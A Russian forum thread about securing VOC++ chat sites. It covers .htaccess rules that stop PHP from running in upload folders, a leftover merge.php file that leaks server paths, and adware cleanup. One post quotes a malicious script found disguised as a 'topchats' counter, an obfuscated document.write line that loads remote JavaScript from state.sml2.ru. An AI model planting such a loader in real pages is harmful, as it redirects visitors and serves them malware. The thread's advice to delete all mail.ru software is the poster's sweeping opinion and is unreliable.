Форумы » VOC++ чаты (больше не поддерживаются) »

Безопасность чатов VOC++ (и не только их)



298
mychatik
В чате есть папки, в которые грузятся картинки самим пользователем - это и фотографии, и вложения, и графники ( у кого в магазине есть товар "Графник")... И туда могут, под видом картинки, влить какую-нибудь каку...
Поэтому, во ВСЕ эти папки нужно добавить [b].htaccess[/b] следующего содержания:

Для серверов, которые работают в режимах [b]CGI[/b], [b]FastCGI[/b], [b]suPHP[/b], [b]DSO[/b] (Apache).

[code]<FilesMatch "\.([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Ph][Hh][Tt][Mm][Ll])\.?.*">
Order allow,deny
Deny from all
</FilesMatch>[/code]
Этот код запрещает прямое обращение к PHP файлам, находящимся в папках.

На серверах работающих в режиме [b]mod_PHP[/b] (DSO - Apache PHP), где не запрещены директивы [b]php_flag[/b], [b]php_value[/b]
добавляете файл [b].htaccess[/b] следующего содержания:

[code]php_flag engine off[/code]
Данная строчка отключает использование PHP интерпретатора при попытке обращения к PHP файлам находящимся
в этой папке, а также находящимся во всех вложенных папках.

В итоге, даже в случае заливки в эти папки файлов со зловредным PHP кодом, они становятся для злоумышленника совершенно бесполезными, т.к. попросту не будут запускаться и выполнятся сервером.

[b]ВАЖНО![/b] При использовании данных директив, обратите внимание, чтобы в защищаемых таким образом папках, не было ваших PHP файлов. Иначе они также будут заблокированы для исполнения.
298
mychatik
В корне чата почти каждой сборки находится файл-паразит [b]merge.php[/b].
Зачем он там и кто, с какой целью вложил его во все сборки - неизвестно.

[quote=Marik]Казалось бы мелочь, но уязвимость таки присутствует на многих чатах, позволяя атакующему узнать абсолютный путь к скрипту на сервере и в дальнейшем использовать для каких-либо целей.
Как известно в дистрибутиве чата много лишних (мусорных) файлов, которые не используются чатом и при этом разработчик также не удосужился их удалить. Среди них файл [b]merge.php[/b], который находится в корне чата и присутствует в стандартном дистрибутиве чата, приходящем от разработчика.
Естественно, в большинстве чатов этот файл не удаляли. При прямом обращенни к файлу, выбивается соответствующая ошибка с раскрытием путей.[/quote]
Файл самим скриптом чата нигде не используется и что именно он должен был делать - тоже сложно сказать.
Верно только одно, что ничего хорошего для чата он не принесёт, а только может помочь злоумышленнику взломать чат.
Если обратится к этому файлу, то на экране можно увидеть ошибку и полный путь, типа:

[code]Warning: fopen(/xfs/VH/c.vbios.com/data/users.dat) [function.fopen]: failed to open stream: No such file or directory in /var/path/chat/mvoc.ru/merge.php on line 39[/code]
А это очень полезная информация для хакера 😀

Советую всем проверить на наличие и удалить этот файл. И не переживайте - он никак не взаимодействует с чатом.
Чат после его удаления будет работать, как и работал.
298
mychatik
Может ещё кому пригодится и поможет.

Только что ко мне обратились с просьбой найти, почему при входе в чат, при вводе логина, вылазят какие-то рекламные блоки.

Лично я никаких блоков не увидел. Но...

Сканирование индексной страницы с помощью [b]Firebug[/b], показало наличие скрипта непонятного счётчика.

[img]http://imgs.su/users/67540/1496789273.png[/img]

Немного погуглив - выяснилось, что это никакой не счётчик, а вирус - мобильный редирект.
Причём он у меня почему-то выдавал ошибку 404 - поэтому я и не видел этой рекламы.

Визуально, адреса [b]state.sml2.ru[/b] на странице не находилось. Но при просмотре подключаемых скриптов - был обнаружен левый скрипт, замаскированный под счётчик статистики [b]topchats[/b].
[code]<script src="topchats/topchats.min.js"></script>[/code]
А внутри этого скрипта - и сам код:
[code]/* Write counter URL */
document.write('<sc'+'ript type="text/ja'+'vasc'+'ript" src="http://state.sml2.ru/js/counter.js"></sc'+'ript>');function sl4cr9ch9x(o6sy90xo, fzb1gs) ... и так далее, зашифрованный код ...[/code]
Будьте внимательны со своими чатами! Не допускайте левых людей к админке и серверу.

А админу данного чата - для начала, в срочном порядке, менять пароли к серверу/FTP и удалять из файлов эту гадость.
Удалить подключение скрипта с индексной страницы и сам скрипт [b]topchats.min.js[/b] из папки [b]topchats[/b] в корне чата.
А может и всю эту папку. Смотря что в ней находится ещё.
298
mychatik
Однажды мне сбросили вот такой скриншот.

[img]http://imgs.su/users/67540/1501509507.jpg[/img]

Это открывалось вместо комнаты чата, при входе с ЛЮБОГО браузера.
С телефона вход нормальный.

[color=red][b]Это вирус на стороне пользователя.[/b][/color]
В большинстве случаев этот паразит - программа [b]Video and Audio plugin Ubar[/b]. Она встраивается в любую загружаемую страницу, отправляя персональные данные и выдавая кучу рекламы.

Лечение - через [b]Uninstall Tool[/b] (или подобную) найти все программы, установленные в день возникновения проблемы. Особенно, в которых есть слово [b]Ubar[/b].
Удалить их с принудительной чисткой реестра.

[b]P.S.[/b] Походу, если найдена программа (по статистике она есть почти у всех) [b]sputnik.mail.ru[/b] - тоже удалить! По функционалу и скрытному способу установки - это тот же рекламный вирус и пользы от неё - никакой.
Также можно удалить всё, что имеет в названии [b]mail.ru[/b] (кроме того, что вы действительно устанавливали и пользуетесь им).

Неавторизованные и новички не могут отправлять сообщения.

© 2008-2020
Контакты | Группа | Privacy и Cookie | Правила